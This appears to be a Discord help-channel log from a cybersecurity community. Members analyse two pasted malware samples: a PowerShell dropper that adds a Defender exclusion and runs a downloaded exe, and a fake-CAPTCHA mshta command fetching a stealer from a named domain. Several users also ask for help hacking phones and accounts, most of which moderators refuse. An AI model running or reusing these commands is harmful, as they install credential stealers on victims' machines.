#👥・help-me
1 messages · Page 36 of 1
@chilly merlinhttps://github.com/danielmiessler/SecLists
https://github.com/n0kovo/awesome-password-cracking
you have a preference in file type?
ok
you really should use some kind of analysis tool on files like this that you have to download from an unverified source
it's just good opsec
and avoid unverified sources always if you can help it
I don't know why I can't locate any of these tools for that purpose
NAPS2 is free scanner software made easy. Scan to PDF, edit your documents, and use advanced features like OCR. Available on Windows, Mac, and Linux.
to be clear, not used this
but add this stuff to your toolbelt
ok got it
ok i might can find these
maybe, i sure can't seem to for some reason
i guess some of these online tools disappear
I'll have to add you to send this I guess
I like that, it’s nice to know we’re not all alone in this awful world
hey J
you changed you profile pic, wasn't sure if that was you or not
how's work?
Yes!! Sorry since before I only used discord for talking to friends I had my own picture but anonymity is important? 😭😭 imagine my ex is in this server lol I’d be killed sooner or later ☠️
Work is busy as always, only 8 more hours to go 😵💫
Yeah it is, I almost said something about it earlier and then forgot with all the seemingly more pressing matters
You're not going anywhere 🙂
If you were in the US I'd probably ship a pistol to your nearest dealer for you to pick up and start practicing. I've got a few inexpensive extras that have been sitting in my inventory forever.
Yeah
Too gore for them?
So… is there a way to use a command to perhaps get on the algorithm? 👀
hello, I have a question about bug bounty. how can I get my first bounty?
not sure i know what you're asking
i don't think there's an easy answer to that, but this may help you a little
https://www.bugbountyhunter.com/
how dos a modern processor convert binary into code?
Hi all. I’m not very good at tech but I’ve lost my job and want to learn more about cybersecurity to be able to do better for the future while I work other gigs. Appreciate any tips and advice on a timeline for what skills to learn first and how to get certified (if that helps with employment? Idk , really). Thanks for any bits of help here. Hope you have a good day
That's actually a very good and complex question. But there are some sources that try to explain it.
https://www.youtube.com/watch?v=2y1IgW2T8bo
It's extremely easy to take the process of converting source code to machine code for granted. Every day, we write code, but do we understand how the code gets generated? How is the code stored? How does it get ran? By understanding the technical underpinning of these ideas, we can all become better developers.
In this video, I'd like to answer...
thank you sir
anyone know any lateral movement and pivoting practice room
Related to AD?
On HTB you have the pro labs. But it does cost quite a bit
Noice
The man, the myth, the legend xct has also some AD stuff which likely involves lateral movement
oo
help me in finding the site that is vulnerable to rpc
no
ok
Platforms like HackerOne or Bugcrowd allow hackers to find vulnerabilities with company permission. You could search for challenges specific to RPC or related network vulnerabilities and give it a try, stay legal ma guy🫡 🤣
Platforms like TryHackMe, Hack The Box, or CTF challenges can help simulate ethical scenarios involving RPC vulnerabilities.🤘
Hello
How do ibchange my username to orange?
Go to user setting
And then?
can you hack with metasploit win 11
i saw on eternalromance suport for win10 pro but don't know If using another exploit will work
cost?
£100
Alr bet
cant seem to find anything will drop in dms if i finf anything
alr thanks
ping me if anything drops
Help me
Contribute to CNSP-Workshop/CNSP-resources development by creating an account on GitHub.
Big Thanks man!!!
How to use VScode in IOs?
??
Hello guys how are you doing?
I am interested in learning software development
How should I go about it?
I have a question there’s been speculation about the TikTok server being based in the US owned by Meta located in Utah now. How are people tracking the TikTok server ?
Can anyone help me checking that does this method is real or fake or scam or phising or any type of hacking
I’m currently a college student studying A-Level Computer Science, Physics and Mathematics. I have recently taken onboard an Extended Project Qualification in Cyber Security. Through my research I have decided to do a project on Artificial Intelligence in Cyber Security, both as a threat and as support. I plan for one of my paragraphs to be about professional’s views. Because of this I have created a form and would like to ask as many people as possible to complete it. Thank you in advance!
https://forms.gle/st1qU7FFGMUotT387
That already sounds like malware to me.
VirusTotal
That's why I wasn't sure
I'm going to check it out what it does
$downloadUrl = "MALICIOUS URL SO I REMOVED IT"
$tempPath = "$env:LOCALAPPDATA\activator.exe"
function Add-WindowsDefenderExclusion {
param (
[string]$Path
)
try {
Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue
} catch {
# Игнорируем ошибки
}
}
try {
Invoke-WebRequest -Uri $downloadUrl -OutFile $tempPath -UseBasicParsing -ErrorAction Stop
Add-WindowsDefenderExclusion -Path $tempPath
Start-Process -FilePath $tempPath -WindowStyle Hidden -Verb RunAs -Wait
Remove-Item $tempPath -Force
} catch {
exit 1
}
LMAO
This bypasses the virus defender isn't it , but after that what it does tell me
It creates a Defender exclusion to %appdata% and executes a .exe that is defined inside the $downloadUrl variable
it is pretty readable
Looks like already to be a paassword stealer
@crisp star question is does the system allow this , i mean placing in a temp path
It's good that I didn't try it thanks guys
and run .exe
I was almost beleiving him
then boom
im thinking need to run with admin previleges
Why shouldn't it be allowed? Also based on the vindeo you have to run PowerShell as administrator for obvious reason like the defender exclusion.
''
Yeah that makes sense it has all privileges to hack
Ewww it's made with GO
Can you tell me how to make a safe virtual environments to test this kind of things
Install Windows 10 Enterprise and install FlareVM
Inside VirtualBox or any other virtualisation software
Thanks
My god I'm amazed of the comments under this video 😂
I think he does it by his other fake ID's because no one has reported of anything going wrong
To be fair, I wouldn't be suprised if people don't notice that they've been hacked.
In the script it is also written
No bro I stumbled upon while scrolling tik tok casually
That's normal if you go to the website directly. You need to have a specific user agent to see it.
Because the hacker is at least a bit smart and know that exposing malicious code to the public would be plain stupid.
Again thanks you all guys for sparing some time on my matter
https://www.virustotal.com/gui/file/2c973057cbbe0d9836f477281a06b51c6ce009c5ac7683f4255743e7d01ca9ca
VirusTotal
I hate analyzing Go malware
wtf is this wack file
I can see that. Wheres it from? o,o
Its doing a lot of things
Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Can someone tell me pros and cons of pentesting vs malware analysis, which you chose professionally and why??
Just your genuine experiences with both and which you preferred
I'm having some issues with openvpn, it's coming back with fatal errors related to the config but after removing and reinstalling it still has the same issue. I'm using a Linux vbox if that changes anything. I've had a look at the plaintext file and that hasn't fixed anything
@mild quartz
Hy guys I need help with getting login access to my old account
Hi everyone, am new here and am happy to be here.
Hey I’m new here & just trying to get into my girl phone! Can anyone help me out??
no
if you don't trust her break up with her, don't be a creep
Just a friendly reminder that discussions or actions related to unethical activities, including unauthorized hacking or similar behavior, are not permitted in this space. We appreciate your cooperation in fostering a positive and ethical community.
But I need help. Am a struggling guy from Cameroon , Africa. And I need help in getting an online job like remotely working from my home were I can get some genuine money online. Anyone?
Sorry
you could get a cyber job by learning CS or Cybersecurity
pentesting is vague, could u specify?
Tried doing that but it’s too expensive for me and can’t afford it right now. Any other kind of online job will be much appreciated pls 🙏🏾
this aint whitehat activities either
Thnks fr da site but they only accept us, uk and other European citizens. Do u hv any sites that I can do online surveys that pays well or , even watch videos like YouTube videos n get paid ?
waddup yall. Question:
CentOS + PI 4. Pros and Cons? Go
"Go"
who do u think we are, ur servants?
It’s not a common practice; CentOS is a heavy-weight distribution, and some packages may not support ARM architecture
Ok, thnks man 🙏🏾 I appreciate ur time
Yeah i agree. my corporate building uses it though. thought about pentesting their biometric security.
on ARM Architecture?
havent gotten that far yet to determine so. they developed their own POE hats and chasis, so hardware is a no no. as for the repositories, im currently MITM a super admin
Hi y'all ...can y'all help me with Creating trading bot?
Hi, I'm 25 and a business owner in the hospitality industry.
I'm learning cybersecurity through TryHackMe then going eventually jumping on HacktheBox. Penetration Testing is the angle I want to take.
I think it's a good business to get into and only will get more demanding and I truly enjoying learning cybersecurity.
I've been playing overthewire to speed up the learning process.
Any guidance and/or advice to learning cybersecurity and the business-side of the space. Thank you
hlo guys i'm new in cybersecurity and i like to learn hacking but don't know where to study from can u guys help me with this
Check out #👥・new-member-guide
Get a strong foundation on fundamentals and move on to the rest . And also try to setup a lab nd practice using it .
Start with tools like nmap Google dorking
For reconnaissance
And also feel free to ask abt pentesting at #💬・old-gen-chat or #😈・pentesting .. peeps are here to help/guide 🗿
Thanks, and what do you mean to set up a "lab and practice"?
Virtual machines
How can I make night owl like bot
I already installed a Vm with Kali on my Mac to use for Overthewire
It's such a well written bot
And also get you can get much resources in #1181325692823150642
ooh
Checkout youtube.....
You’ll know about that chime stuff going on?
nope all good
Chime??
@chilly eagle Channel name?
just search it up
Anybody know about that come stuff going on
@chilly eagle recommendation ?
Kev Roberts
i havent tried creating one
What is it about
Ok@chilly eagle
freecodecamp might have a video based on that
freecodecamp ??
Yea I’m new to the underground
huh
if u wanna learn hacking check out #👥・new-member-guide
You know what I mean curious minds

@chilly eagle do night owl reply?
Same reaction
peeps with knowledge u mean ??
Thanks
@chilly merlin
@chilly eagle red is dangerous 😭
It doesn't
its a bot
O
@chilly eagle u remember v_hb guy?
Any idea
Oni ig
ye
aight we better hop into #💬・old-gen-chat 
Okie
hey does someone have a min to help me on forensics on a pdf
it's driving me mad for no reason ig
you guess that its making you mad?
can i dm you about it or ?
It depends what you try to figurd out.
i need to find the society that someone is working for from a pdf
i've tried the basics of searching key words in the document, looking through the details of the file for metadata but nothingg
yeah dm me
How does someone can find information email, facebook, instagram, etc knowing the full name of that person ?
I need to find an old gf...
try using google "Full Name" site:linkedin.com or email discovery tools ,username serches, Reverse Image Search, Public Records and Directories or simply give up🤣 🙏 good luck my guy
this old gf suffers from cancer and since 2021 it did not reply to anu messages...
well ma guy srry to hear that but if you know any family members name do search on them and try contacting them! public serachs like trust finder or others to find more info ma guy give those a try HOPE THIS HELPS🙏
Hey question is the secops group exam worth ?
Can anyone point me in the right direction of learning cybersecurity for free? And getting certified? Are there anything on that and app development, coding?
depends on your career goals and how it aligns with your current skills and future plans
@kvts okay so to be specific, I know most pentesting jobs are web related, but I don't really think I like web security all that much. And where I'm from, it's mostly web security. And also, I was learning HTB ctf before for a while around last year, but due to poor internet connection I had to put it on hold for a while. So I was looking into offline options in cyber, and I stumbled on RE. Ive made alot of research cause I'm paranoid as hell about focusing on the wrong thing(I'm that kinda person that just likes to focus on something early). Anyways, I did wanna start learning crackme. I've watched a few YouTube vids and it's all intruiging. But I need reassurance. I want someone that has done both to tell me what he/she has experienced, pros and cons, and basically creativity and enjoyability in both fields. Any aspect of pentesting too
@kvts
If you're not into web security but find Reverse Engineering (RE) and CrackMe challenges intriguing, RE could be perfect for you. It's all about creative problem-solving, breaking down code, and bypassing protections—intellectually fun and challenging! It's more niche, but great for areas like malware analysis or exploit dev. 🧩
Pentesting is broader, mainly focused on web security, but involves a lot of different skills like network testing and discovering exploits. It can be rewarding, though if you're not into web stuff, it might feel repetitive. 🤔
Both have huge career potential
Lemme just add also, it's cliche but I'm honestly afraid of automation. Low hanging pentesting can be automated, and I guess red teaming cannot. But, I don't know, I'm just being paranoid as usual. Too much reddit stories is killing me
I totally understand where you're coming from! It’s easy to get caught up in the fear that automation will take over cybersecurity fields, especially when you read stories on Reddit. Yes, low-hanging pentesting tasks (like simple vulnerability scanning or common exploits) can be automated, and tools like Burp Suite or automated scanners are commonly used in those cases. But red teaming is far less automated—it's not just about exploiting systems, it's about creative strategy, evading detection, and adapting in real-time to countermeasures.
What’s important is the human touch in cybersecurity: thinking on your feet, adapting to new situations, and outsmarting attackers, which is exactly where automation can’t replace you. Automation helps you work smarter, but problem-solving and creativity will always make you a valuable asset.
So, your paranoia? Totally normal—it shows you care! Just remember that advanced roles like red teaming, incident response, and reverse engineering require lots of human ingenuity, which is what will keep you relevant and secure in the industry! You’ve got this. 💪
@666_master if I find pentesting repititive won't malware analysis still be repititive too?? If you follow thesame logic
I totally get where you’re coming from! It’s easy to think that both pentesting and malware analysis would feel repetitive, since you’re often following similar steps in both fields. But there’s a big difference in how that repetition plays out...
.
With pentesting, especially in web security, it’s true you’re scanning for vulnerabilities and testing exploits, but each system and target can offer new twists and challenges. You'll rarely deal with the exact same setup or environment, which means you're constantly adapting and thinking on your feet.
.
On the other hand, malware analysis might seem repetitive at first glance too, like reviewing files and code, but the beauty is no two pieces of malware are alike. Every new sample could have its own unique tricks and behavior to discover. You’re always figuring out the why and how behind the malware, which makes it feel less like a routine and more like solving a puzzle every time. 🔍
.
So, in a way, both fields will involve repetition, but malware analysis tends to feel more dynamic and exciting because you're constantly learning about new threats. At the end of the day, it’s about what kind of challenges you enjoy the most!!!!
@666_master
So,to you,following your comment,malware analysis is less likely to keep me bored
to me yes💪
@666_master
Thank you. Honeslty. I needed this🙇🏾♂️
always here to help with what i can ma guy🫡 🙏
Hey @fleet nest I have a question can I dm you?
Anybody know where I can download free books like the 7 seconds Tesla rituals
Hello I’m new here
we can't assist with downloading copyrighted books illegally
Oh sorry
Hey @fleet nest do you know a good website to watch new movies
How about sites where I can get legit socks 5
@thin prawn thanks
Honestly I wouldn't be trusting sites for pirated content dropped from someone you don't know in a Discord you've just joined...
Asking for trouble
Bro I’ve been using this site for ages and I’m not here to mess with someone we are a family out here unless you got evil intentions
🤷♂️ just saying, nothing against you, but it's good advice regardless.
I mean you’re also right though
I’ve just been here asking for a site where I can download a book I can use to better my life instead of being a scammer and no one would help me
Is what it is. Not a server for sharing links related to piracy, but up to mods as to whether this is allowed I guess. I'll shut up again 🤣
Hello im a beginner and id like help in finding ways to learn
Thnk u
hey guys i wanna have a look around dll injecting but not really sure where to start.
Please can someone help me I'm a bigginner using Kali
try this 1.Learn Basics of DLLs (Dynamic Link Libraries), 2.look for Tools for DLL Injection, could start by injecting a simple DLL into an existing application to see how it alters the behavior of that process. You could make a simple “hello world” DLL that shows a message box when injected other then that your on your own ma guy " REMEMBER NEVER USE maliciously"😊 🙏
thank you, I have no intentions to use maliciously just wanna have some fun on games that dont have any hacks available
Need full software for my ZSC 160 card reader and writer please
The manufacturers site has documents and downloads
It's ZCS also
Not ZSC 😉
You could literally paste what you asked in Google for the link
Seems blocked by Windows Defender mind.. so I'd be cautious.
By Chrome, rather
Have tried but all the software doesn’t give me the option full and access
Sounds like a question for the manufacturer tbh, unless anyone has experience with that model here 🤷♂️
exes in the SDK etc are also being picked up by defender as malicious on inspection
The manufacturer did not include the software when I bought it from China and I contact another manufacturer who gave me a download site and I looked also on Google but it doesn’t enable all the function of the card reader that’s why I’m stocked
Well, good luck I guess 😐
It includes an API guide over USB->serial comms
Damn, they don't include source for the libs they distribute?
That's pretty crap
What are some devices that can work with 5ghz wifi? I mean the flipper zero cant, for kali linux you need a special wifi adapter…
Could get something like a mecha comet XD
ALFA has decent dual band adapters
(which are compatible with injection, monitor, etc)
Panda PAU09
Out of interest, what's the PAU09 got over the ALFA? Panda uses the RT5572 chipset, the above Alfa the RTL8812
Lightweight, plug and play on Linux
The RTL8812 appears to be better performance wise
Fair enough, was just curious
Yup it is indeed better
Still waiting for the ESP32C5 boards to come out
Yeaa
although that performance compared to full sized adapters of course would be much lower, but that kinda thing on such a small package, pretty cool.
Crap, I meant to call the UK distributor to see if I could get a sample today, fail
I want to get a new adapter soon, but i have to ship it from the US
Not very patient…
Hm.. there's a listing for the chipset on Alibaba @sturdy lance .. how much you wanna bet they're just C6 chips with a new label 😆
lol wouldn’t be surprised if that’s the case 😂. Alibaba listings can be wild sometimes.
I am curious now 😂, did you find anything?
The chip number lines up.. only recently posted, not many sold so looks like a recent posting
Yup, definitely sounds suspicious
Alibaba shenanigans never fail to entertain
That day an Ad popped out, it was a UAV on Alibaba…
https://www.youtube.com/watch?v=vah-11fBigY
Video smells a bit
I'm calling bullshit
Need to find out who purchased a car from Copart.com with lot number and vin - can’t get a title lost it
Reach out if you can help - not for free
See when / if reviews drop lol
Urgh, that doesn't sound very ethical @rancid quartz
Copart won’t give me the persons info - I have no way of finding out
Paid $26k for the truck
Need to reach out to the person who got it n get a duplicate title
Nobody will get that info for you
Your only option is the dealership, or obtaining a new title
Title is in insurance’s name - person who sold me the truck didn’t give me the title and vanished
Asking to obtain personal information like here.. #📜・rules
Sorry, but that's a you problem 😦 Anyone who offers to give you that info will just be scamming you
Best thing to do, obtain a new title from the DMV
Only option is part it out at this point
I mean, if you've already bought it and the person who sold it has vanished and isn't responding, either they themselves didn't have the title, or they nicked the car and sold it on to you
Sounds like a life lesson 😐
No title no money
But yeah.. this isn't the server for this kinda thing tbh..
My bad looking for help everywhere
They sold it to me as clean title - claim to be a dealer 15 days later I showed up to pick up to pick up plates and found out there was nobody there
Yeah, sorry no one can help you here.
Surely you can apply for a new title if you have a bill of sale?
At least in UK there's a process.. a painful one, but a process all the same. Could be during the process without any reference to the original document the vehicle is discovered as stolen though.
Then you're in to handling stolen goods territory
Not in US - no title you’re F
I'm sure I've seen people obtain new titles without the original
Depends on state law I suppose
Anyway, I don't know, only going on what I've seen. Good luck
Thnx
I need help
WITH?
I wanna lean how to hack
Ty gng
Anyone experienced with OpenVAS? Having issues with my install where the NVT database will not update. I've let it sit for several hours.
Stuck with "Synchronization issue: Could not connect to scanner to get feed info"
Hey guys I'm new to discord and I want to learn how to be a hacker
Hey anyone, my friend got doxxed on this website and I don’t know what to do
Hi everyone, I’m seeking guidance on bypassing restrictions and installing custom software on a locked JP6 tablet running version v8.14.12. The device is heavily restricted: I cannot access settings, perform a factory reset, disconnect from the externally controlled WiFi, or gain access through TalkBack. Additionally, USB debugging appears to be disabled, and the tablet enforces forced updates every 30 days.
I’m specifically looking for:
Methods to exploit recovery mode or vulnerabilities in the system to bypass these restrictions.
Tools or steps for flashing custom firmware via USB or SD card, even with USB restrictions.
Ways to disable or remove device management (MDM) to regain full control.
I’d like to learn how to approach this safely without bricking the device or losing future access. If anyone has experience with similar secure devices or can share resources or tutorials, I’d really appreciate it.
Thanks in advance for your help!
Hello y'all. I need help with getting my old Wattpad account back i made years ago. Can anyone figure out the password to my account so I can log in? I would really appreciate you. Here is my old account:
https://www.wattpad.com/user/Antwonfish
Dm me my password btw
I hope asking this isn't breaking the rules of the dos and don'ts
Not here. Speak with support.
Hello everyone, I’m a bit lost on what I’m supposed to be doing. I’ve done a few tryhackmes and hack the box but how do I get a real world scenario where I need to find the vulnerability starting from just the idea that they’re might be a vulnerability rather than a step by step tutorial on a predefined vulnerability? I understand the ethical considerations so I’m not really sure how to approach this or get the real world experience
We have no way of knowing you're the owner of the account, and finding the password or breaking in to it would be cconsidered malicious.
How can I come up with 1200 fast so I don't lose my place. My credit sucks, I have nothing of value other than some Gucci sunglasses becsuse my ex has all my shit and I can't get kicked out and risk having to go back to him
How'd you come to own the device? Sounds a bit odd
How can I hack WiFi network?
Not a place to ask for ways to make cash either..
Google, and use the knowledge legally.
Ok sorry yall
Can anyone help
I understand as it seems kinda sketchy for someone to ask for a password for an account. My old account isn't really that important to break into anyway. It's just a few of my stories old and stuff I need to update
Sure, just there's nothing we can do. You'll need to speak with the websites support channel. Anyone saying they can get the password for you for a fee is out to scam you.
I tried that already
He asked how hackers protect themselves from other hackers?
I purchased it🤔
Oh, ok
But why would it be so locked down?
@halcyon flame you got an answer for this?
Sounds like an enterprise owned device
Use the knowledge gained from those platforms, or increase your knowledge by working through other training, and apply it to either bounty or VDP programs (STAY WITHIN SCOPE)
That's as close - other than labs made to feel realistic - that you will get to a realistic environment
They're all locked down. Rest assure I purchase my device.
Thanks, do you know where I can find those?
You can search right
Research is a big part of the field of security. At least I think you can Google for what I mentioned?
Fair point, thanks for your help 🙏🏾
No worries 🙂
I have a theory, it is true that in this discord, almost everyone is a hacker.
Whether you are one of the good guys or the bad guys.
lol hang on.. those tablets, they're made for inmates, jails, secure facilities
I don't think that's something that should be advised upon here. Do your own research.
We can't verify why it needs to be jailbreaked, or the scenario. Getting involved in jailbreaking a device that is meant to be used for inmates.. I for sure wouldn't want to get involved or connected to helping with that.
Guys is it safe to mine crypto on i5 rtx 2050 with 8 gigs of ram ?
I’m scared coz it’s the best that I have
Well, for starters... I'm on one such device. Secondly, they watch movies, music videos, and spend majority of their time on social media communicating with family and friends. With that said and in mind, the question is for that wish to assist and those that do not(with all due respect)don't have to comment.
And the only one I have
Understood, but I do not, sorry. It's curious and certainly would be an interesting challenge, but not something I want to help with. Out of interest.. a device developed to be so secure etc and a very niche use case, surely it must've been more expensive than a standard tablet? Just curious
@fading dust I'd recommend you remove all those spams across channels too
..apart from one, of course
Cross-posting like that is not looked highly upon
Could anyone help me please
I gave you an answer?
I mean, mining on it for extended periods of time, yes it can damage it
Likely if you were to mine on it until it died, you would not have made enough to cover the cost of the GPU
Okay
I have a useless potato pc with i5 8 gigs of ram
Can I do it on that pc
Like if it gets damaged I wouldn’t have a problem
You won't make any decent amount of money from mining with that GPU to be honest
It's just not worth the electricity cost
You wouldn't be anywhere close to breaking even
Thanks for the info man appreciate it 🫡
I have a theory, it is true that in this discord, almost everyone is a hacker.
Not offended but let me satisfy your curiosity while enlightening you. You seem like one that likes to learn. Florida penal system has started far from rehabilitation. They've not only privatized prisons to profit from it spoils but they've managed to channel investing for the same ppl sending guys to prison and keeping them there. Judges, attorneys, legislature etc. they manager to manipulate the system to their benefit where physical mail has been digitized under the guide of stopping drug trafficking but the officers bring it in. The real reason was to partner with Jpay and force us to buy stamps to write home, or receive mail. As if that wasn't enough they jacked up costs of collect phone calls making it difficult for ppl to contact home. Not asking for pity but simply giving perspective. We've managed to topple their schemes by jailbreaking tablets and not spending money to see or communicate with our families & friends. But now this new update has us stuck! Some ppl still have their original tablets while many lost their during shakes. I'm looking to refine the original program or find an alternative then open the block back up🤷🏿♂️ Now u know...
Understood, thank you for sharing. The system is never perfect on either side
TLDR; lucky you have access to social at all to be honest, but I do feel for you
What spam channels? I don't deal in slander fam🤔
I think I'll stop commenting there really. All the best.
You posted the same message across multiple channels in the server - that's generally deemed cross posting, or spam
I'm good! I've made it 20 yrs with a cellular device. I just settled the past 7 yrs for a tablet. Less consequences than a phn when discovered.
Okay if one of you is a hacker, I challenge you to get information out of me.
Oh, okay. 🙏🏿 For that(I didn't know). I'm new and searching for the right person to teach the apprentice. I'll drop the bag🤷🏿♂️
Honestly, I wouldn't put that challenge out there. Ok, new Discord account etc, but even so some people can be both resourceful and malicious.
can someone teach me about malicious code. i recently stumbled across one and it seems interesting. Its a .pub file with trojan and script (from virus total). and i really wanna check what script it has. can anyone guide me
i thought the method this user used was pretty smart
it was a captcha page and it auto copied a text for me
it had instructions to press win+r, ctrl+v and run it

seemed normal since it had message like:
Captcha no: 12387 blablabla has been verified
Yeah.. control character to hide the remaining content
Why would you paste that in the run window anyway?
You formatted since then?
but upon scrolling i saw mshta command
and a link following it
no i havent done anything since it wasn't insta run or anything plus i didnt run it
i pasted it on run just because i was curious (also was aware)
and mshta command got me even more curious so i copied the link
ran it though virus total and came out clean it was a "shop" url
when i pasted the link, it silently downloaded a .pub file and when i ran that thing through virus total i found out it was trojan and had a script
😁 so i kinda wanna see the script but idk how to
your modules on htb sometimes make me want to slam my head aggressively into a wall
gimme proj ideas
is this a virus?
ic ant show
but its like chinese and installed
it says microsoft corporation
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/
Ah yes the good old fake captcha
i can send links?
let me see if i can get that captcha website
dont click it
mshta https://aroramof.shop/new-riii-1-b.pub | ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165
this was the message pasted into the run command box
The website is
website is safe but the downloaded file isnt
Ah sorry I meant to say that the website is down
oh i didnt know
Well.. yeah it's malicious. Google the filename, and you'll see recent activity related to Lumma Stealer and recent changes in distribution
If you did run the command, you sure as hell should format, so yeah.. hope you didn't
Hello pls I need recommendation
Is there any tool or website I can use to get unlimited referral in a telegram bot I want to check out something pls
Please can someone help with free fire hack?
hi can anyone help me i am locked out of my samsung galaxy s9 phone i forgot my pin
U can't recover it from Google photos?
It would be save in ur gmail ID
i went in back door on my other phone one time long ago but i forgot how to do it
i am new here what u mean gmail id
i cant remmber samsng account info either
Try this
okl thank you so much
@thorn totem brother you can also download 'IMy phone' in your pc and can unlock you mobile with some easy steps
You can get the whole process on youtube
ok yeah the other one is only for unlock sim i need pin screen unlock thank you johnwalter
Welcome @thorn totem
ok shinpi_dark_pease thanks
@thorn totem *it's 'imyfone'
ok
Lol do not share you IMEI number on a website
Except you want someone else cloning your SIM card
I have this older laptop that when it's supposedly off it will turn on or try to open the disk tray. Is there some smaller computer that could be infected and doing this?
is it a power button or bios/uefi issue
What u mean by smaller computer?
ok i didnt know you could clone a phone wow thanks for info
How do i hack my hacked account, its a roblox account and i havent been able to get it back for around 6 years?
You had 6 years to make a new account
no no ofc not. i always check flags before opening any files
just let it go man.
?
I always imagine they are being swept up by a huge tornado or storm, and they just blip out a "help" before they are gone.
help for what?
A long story a crazy insane story corruption extortion and trafficking
Hi guys who can pls tell me how to put a proxy on my Chromebook
How to start ma journey
#👥・new-member-guide check out
Hello guys I have my interview in 2 days as a soc role. Ive a strong knowledge about Networking, Linux and as of SOC I am studying the CompTIA sec+ but it only seems theoretical knowledge. What more should I know as a fresher about SOC
Please help 🥺
Tired of working 2 jobs I need a money hack 😫
Is this a real hacker discord somebody bless my game 🙏🏾
Hello, i am noob. Can i ask, how can i hack any instagram account? Just password.
i need ideas for graduation project related to cybersecurity
@fallow dune #👥・new-member-guide
??? i'm not a noob
i just need ideas for a graduation project idea
he didnt ask for cybersec path 
@chilly eagle I DM u check thatttt 😑
@fallow dune ohhh
😅😅😅
@fallow dune u can create boys
Bot*
💀
What are the easiest ways to make some money using your hacking skills ethically?
I need help hacking my ex’s phone after she cheated on me and willing to pay .
Disgusting.. you, not your ex. Take the L and move on
What would you do if you were to gain access to their phone
Anyway, not a place for such requests #📜・rules #1286135820008296509
I bought her that phone like a couple of weeks before I found out. I just want to delete everything on it or completely shut it down.
You bought it for her
Take the L and move on
Now drop it, not the server for this kind of malicious subject
I’ve been dying to hack the scammers that call lol. How can u get their IP from a call
@sonic atlas @silver vault Just a friendly reminder that discussions or actions related to unethical activities, including unauthorized hacking or similar behavior, are not permitted in this space. We appreciate your cooperation in fostering a positive and ethical community.
We’d like to remind you that OwlSec upholds the highest standards of ethics and integrity in all discussions and activities. Engaging in or condoning vigilantism, unauthorized hacking, or any form of unethical behavior, such as seeking revenge on scammers, is strictly prohibited.
this should help
hello i am new to this whole cybersecurity thing i am in highschool and i am looking for a place to start
Hello send me a DM and i'll try to help you out!
I'm new here
Nice to be here hopefully I can learn something new here
Hi I’m barely scratching the surface of pen testing, computer science ect I was wondering if python was one of the best languages for the computer space ect
I’m interested in malware related things (ethically) just to experiment and develop anti virus and I want to know what language would be good for those
And just obviously pentesting ect
Does anyone have $3 of BTC or ETC to donate for my roobet and stake gambling habits 👀
Would be very appreciated I'm working on a gambling bot

I didn't ask for anything unethical
U just can't go asking peeps for money 
It's 3 bucks but okay dad
...
@sturdy lance I folded and ordered a sample of that supposed C5 chip, which I am assuming is either just a C6, or a reproduction of the C5 chip by sketchy production chain in China. Will report back with the likely "yeah it's not real" response when it arrives and I wire it up 🤣
Go with Low level languages
Heard back from the UK distributor of the official chips also, and they unsurprisingly require a solid business case in order to ship out a sample
Not something I'm going to go to such lengths as to bullshit on, not when associated with HTB
Hahaha nice, if it’s just a relabeled C6, at least you’ll know for sure. Keep me updated when it arrives, i am curious to hear if it’s legit or just another Alibaba special 😂
It was only a few dollars, so very much doubt it's legit
who are u referring as dad? 
but for a few dollars, I couldn't pass up the chance it's an actual repro of the C5 MCU
Yup exactly
It's out of stock on the producers site also, but still up on Alibana
More red flags lol
😂😂
Some kind of reproduction 🤣
Recommendations? I know basic c++ Java and python
C
C c++
I maybe wrong tho since I'm not a malware dev
But u can find like-minded peeps here #🤘・malware-lab
Serial and product number doe sline up with the recently shipped dev kits mind
I won't keep my hopes up

Will need to dig out a dev board to hook it up to
kinda intriguing
fingers crossed it’s not too cursed when it shows up 😂
Thank you!
yall know how to cash out a prepaid virtual visa got it as a gift fr but i rather it be in my bank account instead of spending it?
Need a bank drop..link me if u got one
Hello
At the end of it, it says yojzwpassive=true
I’m trying to log into my Google Chrome Gmail and it won’t load the page for my Gmail login
And in the HTTPs is a bunch of numbers and letters
Why won’t the Gmail load even though my Internet is good
Doesn't sound like a valid login URL..
try checking if u can access other sites
You browsed direct to other sites? Did it just redirect you?
phishing?
On a hotspot, or what?
The other day I was looking at certain discords to join, and the link was on my Google so maybe me linking that could’ve been a bad thing
Hopefully, I didn’t make a bad mistake
hmm
Hey guys, I know this is a dumb question but what are some of things y’all use to study and memorize everything? I be taking hella notes but I get overwhelmed with everything.
The URL is not supposed to be that long and at the end, it says yo passive=true
Can you share the URL, with some parts redacted (like the end of the hostname) in a codeblock? Sounds weird.. or want me to leave it to you Red 🙂
You said you can't reach other sites too, it just times out?
I need all the help I can get cause I feel bad. I was using my girlfriend’s MacBook. For Ethical Hacking research. I’m trying to learn as much as I can because my daughter is born. In a couple days.
She works for the federal government of Canada and this is the last thing she needs on her MacBook so if you guys have anything you can help me with I would appreciate it
I think I just got too deep into things on the computer without taking the right steps
I mean, if Red doesn't mind, friend me so you can DM and I can take a look
No promises I can help, but curious.
She basically gave the computer to me but it has a lot of sensitive stuff on it in her life
All em you
hey guys this is not really a cybersecurity based question but does anyone know a way how to unlock a disk write protection ive tried everything
hey i wanna do a prank on family is if possible to send a message from a different phone but when they receive message its like it was from my family member number
is this possible by any chance
That kind of behaviour is considered illegal by most countries #1286135820008296509
Anyone can help me get my old ig account back
Contact support. Anyone saying they can help you for a fee will just scam you.
nethunter
Can anybody help?
I have a problem with a URL
And Wi-Fi connection - I unplugged my Wi-Fi - if anybody wants to DM me, I can give them more details on the situation.
Learn to ask questions
This doesn't explain anything in the slightest
how to catch someone who hacked my facebook account
I'm still around if you can pass that info, but not up for a video call, sorry
is there a way i can monitor game traffic?
Please can anyone teach me hacking
It's my dream but I can't learn it
Sites that I've seen charge huge amount of money I can't afford
🙏🙏
I need help with studying challenges and solutions for conducting digital forensics in cloud environments and Exploring the impact of virtualization and containerization on forensic investigations.
Yes, but it would involve reversing how the game communicates, protocol, encryption, etc etc, and generally that kinda thing is not done for ethical purposes.. although I've done it out of curiosity before.
Thanks 😊😭
What do you mean by catch ?
Tracking?
to take
on my mom life i need some new courses can someone tell me courses like i need videos
Hey, i need some help/guide
My friend's gmail got hacked by someone hacker changed pass, recovery mail and phone number, and add 2 factor auth
Is there any chance my friend can get there email back?
He has monetize YouTube channel on it
